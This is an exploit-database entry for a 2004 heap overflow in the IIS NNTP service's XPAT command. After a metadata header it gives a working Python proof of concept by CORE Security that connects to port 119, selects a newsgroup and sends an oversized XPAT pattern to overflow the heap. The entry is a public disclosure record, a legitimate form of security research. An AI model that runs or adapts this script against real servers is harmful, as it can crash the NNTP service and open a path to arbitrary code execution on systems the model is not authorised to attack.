IIS NNTP Service XPAT command heap overflow proof of concept

vendor:

Not mentioned

by:

Lucas Lavarello, Juliano Rizzo

7.5

CVSS

HIGH

Heap Overflow

Not mentioned

CWE

Product Name: Not mentioned

Affected Version From: Not mentioned

Affected Version To: Not mentioned

Patch Exists: NO

Related CWE: Not mentioned

CPE: Not mentioned

Metasploit:

Other Scripts:

Platforms Tested: Not mentioned

2004

IIS NNTP Service XPAT command heap overflow proof of concept

This is a proof of concept exploit for a heap overflow vulnerability in the IIS NNTP Service. The exploit sends a specially crafted XPAT command to the server, causing a heap overflow. The vulnerability allows an attacker to execute arbitrary code on the targeted system.

Mitigation:

No mitigation or remediation mentioned

Source

Exploit-DB raw data:

#--
# IIS NNTP Service XPAT command heap overflow proof of concept
#
# Author:
#    Lucas Lavarello (lucas at coresecurity dot com)
#    Juliano Rizzo   (juliano at coresecurity dot com)
#
# Copyright (c) 2001-2004 CORE Security Technologies, CORE SDI Inc.
# All rights reserved.
#
# THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED. IN NO EVENT SHALL CORE SDI Inc. BE LIABLE
# FOR ANY DIRECT,  INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY OR
# CONSEQUENTIAL DAMAGES RESULTING FROM THE USE OR MISUSE OF
# THIS SOFTWARE
#
# www coresecurity com
#--
from socket import * 

host = "127.0.0.1"
pat = "C"*1946  + " " + "X"*10

newsgroup = "control.newgroup"

sock = socket(AF_INET, SOCK_STREAM)
sock.connect((host, 119))

print sock.recv(512)

sock.send("group %s\x0d\x0a" % newsgroup)

print sock.recv(512)

sock.send("xpat From 1-9 %s \x0d\x0a" % pat)


# milw0rm.com [2004-10-16]